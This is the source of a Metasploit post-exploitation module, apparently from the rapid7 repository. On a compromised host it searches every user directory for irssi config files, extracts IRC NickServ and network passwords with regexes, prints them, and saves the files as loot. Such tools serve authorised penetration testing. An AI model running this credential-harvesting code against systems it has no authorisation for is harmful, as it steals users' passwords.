GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/multi/gather/irssi_creds.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
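# Post module that looks for an irssi configuration file in each user
# directory on the session host and stores every config that contains an IRC
# password as loot.
class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Unix

  # Registers the module metadata (name, description, author, supported
  # platforms and session types) with the framework.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Multi Gather IRSSI IRC Password(s)',
        'Description' => %q{
          This module grabs IRSSI IRC credentials.
        },
        'Author' => [
          'Jonathan Claudius <jclaudius[at]mozilla.com>',
        ],
        'Platform' => %w[bsd linux osx unix],
        'SessionTypes' => %w[shell],
        'License' => MSF_LICENSE
      )
    )
  end

  # Entry point: builds the candidate config path for every user directory,
  # keeps the ones that exist as files, and hands them to download_passwords.
  # Reports an error and returns when no config file is found.
  def run
    print_status('Finding ~/.irssi/config')
    paths = enum_user_directories.map { |d| d + '/.irssi/config' }
    paths = paths.select { |f| file?(f) }

    if paths.empty?
      print_error('No users found with a ~/.irssi/config file')
      return
    end

    download_passwords(paths)
  end

  # Example of what we're looking for in the config...
  #
  # ***Identify Password Example***
  # autosendcmd = "/msg nickserv identify example_password ;wait 2000";
  #
  # ***Network Password Example***
  # password = "example_password";
  #
  # Returns true when the file at +path+ contains at least one match for
  # either pattern, false otherwise.
  def contains_passwords?(path)
    # NOTE(review): read_file's failure behaviour is not visible in this file.
    # Coercing with to_s makes a nil result (for example an unreadable file)
    # count as "no passwords" instead of raising NoMethodError on nil.scan.
    data = read_file(path).to_s
    identify_passwords = data.scan(%r{/\^?msg nickserv identify ([^\s]+)})
    network_passwords = data.scan(/^?password = "([^\s]+)"/)

    passwords = identify_passwords.flatten + network_passwords.flatten

    if passwords.any?
      # The matched passwords are written to the console in clear text, so any
      # console log or spool file of this run holds the same secrets as the
      # stored loot and needs the same handling.
      print_good("Found IRC password(s) of #{passwords.join(',')} in irssi config at #{path}")
      return true
    end

    false
  end

  # Stores each config in +paths+ that contains a password as loot and prints
  # where the loot was written.
  #
  # The file is read once by contains_passwords? and again for store_loot, so
  # the stored content is whatever the second read returns.
  def download_passwords(paths)
    print_status "Looting #{paths.count} files"

    paths.each do |path|
      # Non-mutating chomp: leaves the caller's strings untouched and also
      # works when an element is frozen.
      path = path.chomp
      # Paths built by run always end in /.irssi/config, so this only matters
      # for other callers that pass raw directory entries.
      next if ['.', '..'].include?(path)

      next unless contains_passwords?(path)

      loot_path = store_loot(
        'irssi config file',
        'text/plain',
        session,
        read_file(path),
        path,
        'IRC Password'
      )
      print_good("irssi config with passwords stored in #{loot_path}")
    end
  end
end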